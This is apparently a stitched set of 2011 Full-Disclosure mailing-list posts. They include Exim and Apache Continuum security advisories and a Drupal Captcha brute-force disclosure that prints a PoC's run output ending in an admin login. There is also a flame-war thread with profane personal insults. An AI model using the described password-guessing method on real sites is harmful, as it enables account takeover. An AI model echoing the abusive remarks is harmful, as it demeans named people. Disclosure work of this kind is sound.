> > 
> > Subject: [Full-disclosure] {Java,PHP} Server
> > Exploits
> > 
> > To: full-disclosure@lists.grok.org.uk
> > 
> > Date: Wednesday, February 9, 2011, 5:40 PM
> > 
> > 
> > 
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > 
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> > 
> > 
> > 
> > 
> > 
> > -Inline Attachment Follows-
> > 
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/
> > 
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/ 
> > 
> > 
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[Cal Leeming [Simplicity Media Ltd]]

Andrew, I'm gonna tell you the same thing my girl tells me when I'm being
a cunt. You need a fucking slap. lol.

On Thu, Feb 10, 2011 at 5:39 PM, Christian Sciberras wrote:

> One question. Who's "you" that you keep referring to all the time?
>
>
>
>
> On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> Thankfully you are very rarely involved with public and private sector
>> business talks in the UK, so the situation will probably never arise we are
>> in the same board room.
>>
>> Stay in America and keep away from the UK is the best thing that could
>> ever happen to you, because frankly meeting you would be a complete
>> nightmare for me and I would find it hard to work with you on any meaningful
>> level.
>>
>> One thing for sure is you have pissed me off with the way you speak to me
>> via private email and your perceived perception of who I am, and what you
>> think n3td3v is.
>>
>> Maybe in the beginning it seemed like disorganised non-sense to you, but
>> it has evolved and shaped over the years with me and is now a serious force
>> to be reckoned with and is able to compete with other consultancy
>> orgainsations in the UK, now that there are serious consultants on board
>> from the business and government sector in the UK, where we work on
>> meaningful policy reform within organisations, to tighten security against
>> foreign powers, terrorist attacks and other matters.
>>
>> To be perfectly honest, I would like to say, I think you've been reading
>> mailing lists too much, a lot more goes on in industry than the stupid
>> disclosure community, work actually gets done that is meaningful and
>> satisfying when I come home at night.
>>
>> My advice to you is, stop reading mailing lists, get on with the physical
>> industry and stop basing your views of people based on back and forward
>> horse play people have have had between 2004-2009.
>>
>> That part of n3td3v is behind you, me and everyone, I removed the mailing
>> list as a symbolic gesture to move on from that.
>>
>> I'm now a professional, consulting and liaising with other consultants in
>> the UK in the public and private sector through the consortium, the
>> consultants who ive had dealings with in the physical domain who have
>> decided to join through knowing me in a working relationship.
>>
>> The organisation is nothing to do with what it might have been, n3td3v is
>> rethought and matured, along with me.
>>
>> You couldn't possibly say the same orgainsation I started when I was 18 is
>> going to be the same orgainsation today now that I'm 30, it isn't.
>>
>> I've changed, we've changed, the type of people I come into contact has
>> changed through opportunities I've gained in the physical domain.
>>
>> n3td3v is very much nothing to do with anything online-based, but has
>> shifted into the physical domain, in that, its people I actually know who I
>> can shake hands with who are members.
>>
>> That is why the name was changed, the brand, its now a consortium, its
>> nothing to do with online or some silly Google group mailing list.
>>
>> The beginning days of n3td3v between 2004-2009 and the Google group
>> mailing list was used to push my name out into the industry to become known,
>> you should be able to work with me in a meaningful working relationship if
>> you ever had to through work commitments.
>>
>>
>> Everyone else who I meet in the physical domain knows who I am, but they
>> don't judge me for it, they shake my hand and move on with the problems in
>> the industry that are needing solved.
>>
>> They don't say, that's Andrew who used to post in the disclosure
>> community, let's huff and puff about it.
>>
>> They take me as I am in the physical domain, realise it was silly horse
>> play from the past and move on.
>>
>> I hope you are able to do the same, because your attitude just annoys me
>> that you cannot have a mature and professional approach in the way you talk
>> with me.
>>
>> Andrew
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[Christian Sciberras]

One question. Who's "you" that you keep referring to all the time?




On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> Thankfully you are very rarely involved with public and private sector
> business talks in the UK, so the situation will probably never arise we are
> in the same board room.
>
> Stay in America and keep away from the UK is the best thing that could ever
> happen to you, because frankly meeting you would be a complete nightmare for
> me and I would find it hard to work with you on any meaningful level.
>
> One thing for sure is you have pissed me off with the way you speak to me
> via private email and your perceived perception of who I am, and what you
> think n3td3v is.
>
> Maybe in the beginning it seemed like disorganised non-sense to you, but it
> has evolved and shaped over the years with me and is now a serious force to
> be reckoned with and is able to compete with other consultancy orgainsations
> in the UK, now that there are serious consultants on board from the business
> and government sector in the UK, where we work on meaningful policy reform
> within organisations, to tighten security against foreign powers, terrorist
> attacks and other matters.
>
> To be perfectly honest, I would like to say, I think you've been reading
> mailing lists too much, a lot more goes on in industry than the stupid
> disclosure community, work actually gets done that is meaningful and
> satisfying when I come home at night.
>
> My advice to you is, stop reading mailing lists, get on with the physical
> industry and stop basing your views of people based on back and forward
> horse play people have have had between 2004-2009.
>
> That part of n3td3v is behind you, me and everyone, I removed the mailing
> list as a symbolic gesture to move on from that.
>
> I'm now a professional, consulting and liaising with other consultants in
> the UK in the public and private sector through the consortium, the
> consultants who ive had dealings with in the physical domain who have
> decided to join through knowing me in a working relationship.
>
> The organisation is nothing to do with what it might have been, n3td3v is
> rethought and matured, along with me.
>
> You couldn't possibly say the same orgainsation I started when I was 18 is
> going to be the same orgainsation today now that I'm 30, it isn't.
>
> I've changed, we've changed, the type of people I come into contact has
> changed through opportunities I've gained in the physical domain.
>
> n3td3v is very much nothing to do with anything online-based, but has
> shifted into the physical domain, in that, its people I actually know who I
> can shake hands with who are members.
>
> That is why the name was changed, the brand, its now a consortium, its
> nothing to do with online or some silly Google group mailing list.
>
> The beginning days of n3td3v between 2004-2009 and the Google group mailing
> list was used to push my name out into the industry to become known, you
> should be able to work with me in a meaningful working relationship if you
> ever had to through work commitments.
>
>
> Everyone else who I meet in the physical domain knows who I am, but they
> don't judge me for it, they shake my hand and move on with the problems in
> the industry that are needing solved.
>
> They don't say, that's Andrew who used to post in the disclosure community,
> let's huff and puff about it.
>
> They take me as I am in the physical domain, realise it was silly horse
> play from the past and move on.
>
> I hope you are able to do the same, because your attitude just annoys me
> that you cannot have a mature and professional approach in the way you talk
> with me.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-1060-1] Exim vulnerabilities

[Marc Deslauriers]

===
Ubuntu Security Notice USN-1060-1 February 10, 2011
exim4 vulnerabilities
CVE-2010-2023, CVE-2010-2024, CVE-2010-4345, CVE-2011-0017
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  exim4-daemon-custom 4.60-3ubuntu3.3
  exim4-daemon-heavy  4.60-3ubuntu3.3
  exim4-daemon-light  4.60-3ubuntu3.3

Ubuntu 8.04 LTS:
  exim4-daemon-custom 4.69-2ubuntu0.3
  exim4-daemon-heavy  4.69-2ubuntu0.3
  exim4-daemon-light  4.69-2ubuntu0.3

Ubuntu 9.10:
  exim4-daemon-custom 4.69-11ubuntu4.2
  exim4-daemon-heavy  4.69-11ubuntu4.2
  exim4-daemon-light  4.69-11ubuntu4.2

Ubuntu 10.04 LTS:
  exim4-daemon-custom 4.71-3ubuntu1.1
  exim4-daemon-heavy  4.71-3ubuntu1.1
  exim4-daemon-light  4.71-3ubuntu1.1

Ubuntu 10.10:
  exim4-daemon-custom 4.72-1ubuntu1.1
  exim4-daemon-heavy  4.72-1ubuntu1.1
  exim4-daemon-light  4.72-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

ATTENTION: This security update brings changes to Exim's behaviour. Please
review the following information carefully, as your Exim configuration may
need to be adjusted after applying this update.

Exim no longer runs alternate configuration files specified with the -C
option as root. The new /etc/exim4/trusted_configs file can be used to
override this new behaviour. Files listed in trusted_configs and owned by
root will be run with root privileges when using the -C option.

In addition, Exim no longer runs as root when the -D option is used. Macro
definitions that require root privileges should now be placed in trusted
configuration files.

Please see the /usr/share/doc/exim4-*/NEWS.Debian file for detailed
information.

Details follow:

It was discovered that Exim contained a design flaw in the way it processed
alternate configuration files. An attacker that obtained privileges of the
"Debian-exim" user could use an alternate configuration file to obtain
root privileges. (CVE-2010-4345)

It was discovered that Exim incorrectly handled certain return values when
handling logging. A local attacker could use this flaw to obtain root
privileges. (CVE-2011-0017)

Dan Rosenberg discovered that Exim incorrectly handled writable sticky-bit
mail directories. If Exim were configured in this manner, a local user
could use this flaw to cause a denial of service or possibly gain
privileges. This issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, 9.10,
and 10.04 LTS. (CVE-2010-2023)

Dan Rosenberg discovered that Exim incorrectly handled MBX locking. If
Exim were configured in this manner, a local user could use this flaw to
cause a denial of service or possibly gain privileges. This issue only
applied to Ubuntu 6.06 LTS, 8.04 LTS, 9.10, and 10.04 LTS. (CVE-2010-2024)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60-3ubuntu3.3.diff.gz
  Size/MD5:   346884 ecd59d3af2c9db2c15fef1febb99798d

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60-3ubuntu3.3.dsc
  Size/MD5: 1710 881d571f9f38d7aec13b78619798
http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60.orig.tar.gz
  Size/MD5:  2022260 5f8e5834c648ac9a62bb8ab6ad2a6227

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-config_4.60-3ubuntu3.3_all.deb
  Size/MD5:   260742 e256c04ffcb8a31d70296cfb64c15ae2

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60-3ubuntu3.3_all.deb
  Size/MD5: 1580 09fa48896e5245db79e85ccac3cf998f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-base_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:   881218 7780d0cbd71c8d6c5c8716cbb5d7f72e

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-daemon-heavy_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:   472702 91a9f584dea36af8d94a869f82253277

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-daemon-light_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:   417906 f408870290d8a53798fb74e4d1fe9a97

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/eximon4_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:88096 348f9bf5f1d0b7d2656b51eabd09cce4

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-base_4.60-3ubuntu3.3_i386.deb
  Size/MD5:   880976 935da8d989fb9d1797acd0182fa091c3

http://security.ubunt

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[Michael Cassano]

> sleeper agents.  Think about that.. and who *else* might be part of the
> conspiracy.  It could go deeper than even Andrew realizes...
>

Gregory.  D. Evans.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] CVE-2010-3449: Apache Continuum CSRF vulnerability

[Brett Porter]

CVE-2010-3449: Apache Continuum CSRF vulnerability

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Continuum 1.3.6
Continuum 1.4.0 (Beta)
The unsupported versions Continuum 1.1 - 1.2.3.1 are also affected.

Description:
Administrators are able to change any user's password, but the
source of the request is not verified, making the behaviour
susceptible to CSRF.

Mitigation:
Continuum 1.3.6 and earlier users should upgrade to 1.3.7

Continuum 1.4.0 (Beta) users should apply the following patch:
http://svn.apache.org/viewvc?view=revision&revision=1066010

Credit:
This issue was discovered by Anatolia Security Research Group

References:
http://continuum.apache.org/security.html

--
Brett Porter
br...@apache.org
http://brettporter.wordpress.com/
http://au.linkedin.com/in/brettporter




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[James Rankin]

The guy is a feeble Jock troll who obviously thought this whole "National
Security" thing would get him laid.

I have to admit grudging admiration for his tenacity in that he is still
trying to make it work. Determination alone, though, does not an infosec
professional make.

On 10 February 2011 15:22,  wrote:

> On Thu, 10 Feb 2011 14:49:15 +0100, Christian Sciberras said:
> > Why didn't we all think about it in the first place!
> > A conspiracy, so OBVIOUS!!
>
> > On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> > andrew.wall...@rocketmail.com> wrote:
> > > It is obvious they don't want people like me and my organisation who
> deal
> > > in national security on the list, that is why the moderation was
> > > implemented.
>
> Yep, some huge shadowy "national security organization" that nobody but the
> leader admits being a part of, it must be a conspiracy.  I wonder who out
> there
> is a sleeper agent.  Consider Gadi Evron, Marcus Sachs, and myself -
> Andrew's
> done so much to distance himself from all three of us that we must all be
> sleeper agents.  Think about that.. and who *else* might be part of the
> conspiracy.  It could go deeper than even Andrew realizes...
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] CVE-2011-0533: Apache Continuum cross-site scripting vulnerability

[Brett Porter]

CVE-2011-0533: Apache Continuum cross-site scripting vulnerability

Severity: Important

Vendor: 
The Apache Software Foundation

Versions Affected:
Continuum 1.3.6
Continuum 1.4.0 (Beta)
The unsupported versions Continuum 1.1 - 1.2.3.1 are also affected.

Description:
A request that included a specially crafted request parameter could be
used to inject arbitrary HTML or Javascript into Continuum project
pages.

Mitigation:
Continuum 1.3.6 and earlier users should upgrade to 1.3.7

Continuum 1.4.0 (Beta) users should apply the following patch:
http://svn.apache.org/viewvc?view=revision&revision=1066056

Credit:
This issue was discovered by Tal Be'ery of Imperva.

References:
http://continuum.apache.org/security.html

--
Brett Porter
br...@apache.org
http://brettporter.wordpress.com/
http://au.linkedin.com/in/brettporter




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[Valdis . Kletnieks]

On Thu, 10 Feb 2011 14:49:15 +0100, Christian Sciberras said:
> Why didn't we all think about it in the first place!
> A conspiracy, so OBVIOUS!!

> On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
> > It is obvious they don't want people like me and my organisation who deal
> > in national security on the list, that is why the moderation was
> > implemented.

Yep, some huge shadowy "national security organization" that nobody but the
leader admits being a part of, it must be a conspiracy.  I wonder who out there
is a sleeper agent.  Consider Gadi Evron, Marcus Sachs, and myself - Andrew's
done so much to distance himself from all three of us that we must all be
sleeper agents.  Think about that.. and who *else* might be part of the
conspiracy.  It could go deeper than even Andrew realizes...


pgph5hVIGqbfB.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[huj huj huj]

remember to put on the tinfoil hat!

2011/2/10 Christian Sciberras 

> Hahaha!
>
> Why didn't we all think about it in the first place!
> A conspiracy, so OBVIOUS!!
>
> Great way to start my day..
>
> Chris.
>
> On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>>  On Tue, Feb 8, 2011 at 9:38 PM, David Klein 
>> wrote:
>>  > I am sure you can see at this point it becomes complicated. What if an
>> issue
>> > compromising national security gets posted (wetdream) would the
>> moderator
>> > remove it or keep it?
>>
>> It is obvious they don't want people like me and my organisation who deal
>> in national security on the list, that is why the moderation was
>> implemented.
>>
>> Andrew
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[Christian Sciberras]

Hahaha!

Why didn't we all think about it in the first place!
A conspiracy, so OBVIOUS!!

Great way to start my day..

Chris.

On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Tue, Feb 8, 2011 at 9:38 PM, David Klein 
> wrote:
> > I am sure you can see at this point it becomes complicated. What if an
> issue
> > compromising national security gets posted (wetdream) would the moderator
> > remove it or keep it?
>
> It is obvious they don't want people like me and my organisation who deal
> in national security on the list, that is why the moderation was
> implemented.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [AntiSnatchOr] Drupal <= 6.20 insecure Captcha defaults PoC

[Michele Orru]

Drupal <= 6.20 insecure Captcha defaults PoC

 Name: Drupal <= 6.20 insecure Captcha defaults PoC
 Systems Affected: Drupal <= 6.20 with Captcha <= 2.3
 Severity: Medium
 Vendor: http://drupal.org
 Advisory: http://antisnatchor.com/Drupal_insecure_Captcha_defaults_PoC
 Author: Michele "antisnatchor" Orrù (michele.orru AT antisnatchor DOT com)
 Date: 20110210

I. BACKGROUND
Drupal is a world-wide used open-source CMS written in PHP:
being really flexible and easy to extend, is the de-facto
choice for many small and big websites/portals that need a robust
framework on which model their business.

II. DESCRIPTION
Many Drupal users use Captcha challenges (specially with reCaptcha) in their
websites to protect sensitive resources from bots and spammers.
In fact, we've always red and seen Captcha (Drupal or not) implemented
to protect sensitive forms from online dictionary and bruteforcing attacks.

The default configuration of Persistence options for the Captcha module
in Drupal are insecure: the persistence option is set to "Omit 
challenges in a
multi-step/preview workflow once the user successfully responds to a 
challenge."


This means the following: if I will be able to correctly solve the first 
Captcha challenge in the login form,
but the login credentials are invalid, there will be no new Captcha 
challenge to solve in the login
form presented after the HTTP response. In this situation is possible to 
automate a dictionary/bruteforcing attack.



III. ANALYSIS
I've attached a two hours made Ruby PoC that automates a password guessing
attack to a known username. The code is commented enough, but basically 
having
the cookie, the form anti-xsrf token and the captcha token/sid the 
bruteforcing

can be automated. These values should be changed in the code, in a way that
the first request is valid and contains the right captcha sid and 
cookie: the next
captcha/form tokens will be parsed and added to the HTTP requests 
automatically.


An examle of the output:
/opt/local/bin/ruby -e 
$stdout.sync=true;$stderr.sync=true;load($0=ARGV.shift) 
/Users/antisnatchor/WORKS/BEEF/drupal-intruder/drupal_captcha_intruder.rb

+Initial xsrf token [form-43fb0bcbcb140066a782a3fc23ab1ab7]
+Initial captcha token [d853d6df05f6c6a956a46f20c8fe20aa]
+Dictionary attack with [4] passwords
+Testing password [test1]
+Request headers = 
{"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; 
has_js=1;", "Referer"=>"http://antisnatchor.com/user";, 
"Content-Type"=>"application/x-www-form-urlencoded", 
"User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}

+Code = 200
+Message = OK
+New xsrf token [form-f83fba9470bf8e3bfa035291b94fcc32]
+New captcha token [aa6e143f8c43c6b1ec87b59f6ab5bf6d]
+Testing password [test2]
+Request headers = 
{"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; 
has_js=1;", "Referer"=>"http://antisnatchor.com/user";, 
"Content-Type"=>"application/x-www-form-urlencoded", 
"User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}

+Code = 200
+Message = OK
+New xsrf token [form-6fba4b48adf6cec02539075edb4fb5f6]
+New captcha token [3e36c79be84a0cdf3a5eefbd0715ecdd]
+Testing password [test3]
+Request headers = 
{"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; 
has_js=1;", "Referer"=>"http://antisnatchor.com/user";, 
"Content-Type"=>"application/x-www-form-urlencoded", 
"User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}

+Code = 200
+Message = OK
+New xsrf token [form-a14e4668b0a8b7fa826bb04d1aa8590a]
+New captcha token [c9a90bbd487de5733b7231ff832c5dd6]
+Testing password [antisnatchor666!]
+Request headers = 
{"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; 
has_js=1;", "Referer"=>"http://antisnatchor.com/user";, 
"Content-Type"=>"application/x-www-form-urlencoded", 
"User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}

+Code = 302
+Message = Moved Temporarily
+Succesfully authenticated user[admin] with password [guessme]

A little note: to try it you need a few ruby gems like nokogiri you'll 
probably

don't have normally.


IV. DETECTION

6.20 and earlier versions are vulnerable.

V. WORKAROUND

Proper configuration of Drupal flood protection module should mitigate 
this issue.
Also changing the Captcha persistence options to "Always add a

Re: [Full-disclosure] {Java,PHP} Server Exploits

[Yorian Wiltjer]

Too all,

PHP version fixed in version 5.3.5 and 5.2.17 released on Jan 6th 2011.
And bug only in the 32-bit version off PHP (even on 64bit a cpu)
http://www.php.net/archive/2011.php#id2011-01-06-1

Le reg report that oracle fixed the mark of the beast in there new patch.
After it been there for 10 years.
http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/

php devteam time one month
java developers about te years

So yay opensource.

With friendly greetings,
Yorian

PS,
Don't forget to upgrade

2011/2/10 Troy Aerojam 

> It borders idiocy this hasn't been plugged.
>
> Aerojam
>
> --- On *Wed, 2/9/11, Leon Kaiser * wrote:
>
>
> From: Leon Kaiser 
>
> Subject: [Full-disclosure] {Java,PHP} Server Exploits
> To: full-disclosure@lists.grok.org.uk
> Date: Wednesday, February 9, 2011, 5:40 PM
>
>
>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>
>
> -Inline Attachment Follows-
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/